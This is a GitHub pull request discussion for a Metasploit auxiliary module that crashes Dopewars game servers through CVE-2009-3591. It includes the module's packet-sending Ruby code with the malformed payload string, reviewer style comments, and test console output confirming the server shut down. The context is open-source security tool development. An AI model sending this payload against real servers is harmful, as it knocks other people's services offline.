Dopewars DOS module #1580

Merged
merged 7 commits into from Mar 14, 2013

Projects

None yet

3 participants

@dougsko
Contributor
dougsko commented Mar 12, 2013

Hello,

I would like to submit a DOS module for inclusion in the main project tree. This module exploits the vulnerability found here:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3591

Please let me know if you have any questions. Thanks!

-doug

@L1ghtn1ng
Contributor

please run msftidy on this module lots of errors need fixing plus can you add the license terms at the very top of the module see another module for example

@L1ghtn1ng

version is not needed please remove

@jvazquez-r7 jvazquez-r7 commented on the diff Mar 14, 2013
modules/auxiliary/dos/dopewars/dopewars.rb
+ def run
+ # The jet command is vulnerable.
+ # Program received signal SIGSEGV, Segmentation fault.
+ # [Switching to Thread 0xb74916c0 (LWP 30638)]
+ # 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at
+ # serverside.c:525
+ # 525 dopelog(4, LF_SERVER, "%s jets to %s",
+ #
+ connect
+ pkt = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"
+ print_status("Sending dos packet...")
+ sock.put(pkt)
+ disconnect
+
+ print_status("Checking for success...")
+ sleep 2
@jvazquez-r7
jvazquez-r7 Mar 14, 2013 Contributor

Please don't use sleep, use "select(nil, nil, nil, time)"

https://github.com/rapid7/metasploit-framework/blob/master/HACKING#L39

@jvazquez-r7
Contributor

Tested successfully on Dopewars 1.5.12 / Win2003 SP2

msf  auxiliary(dopewars) > show options

Module options (auxiliary/dos/dopewars/dopewars):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  7902             yes       The target port

msf  auxiliary(dopewars) > set RHOST 192.168.1.135
RHOST => 192.168.1.135
msf  auxiliary(dopewars) > run

[*] Sending dos packet...
[*] Checking for success...
[+] Dopewars server successfully shut down!
[*] Auxiliary module execution completed

I'm going to proceed with last cleanup by myself and merging (btw will be moving to a auxiliary/dos/misc folder).

Thanks!

@jvazquez-r7 jvazquez-r7 merged commit 22133ba into rapid7:master Mar 14, 2013

1 check passed

default The Travis build passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment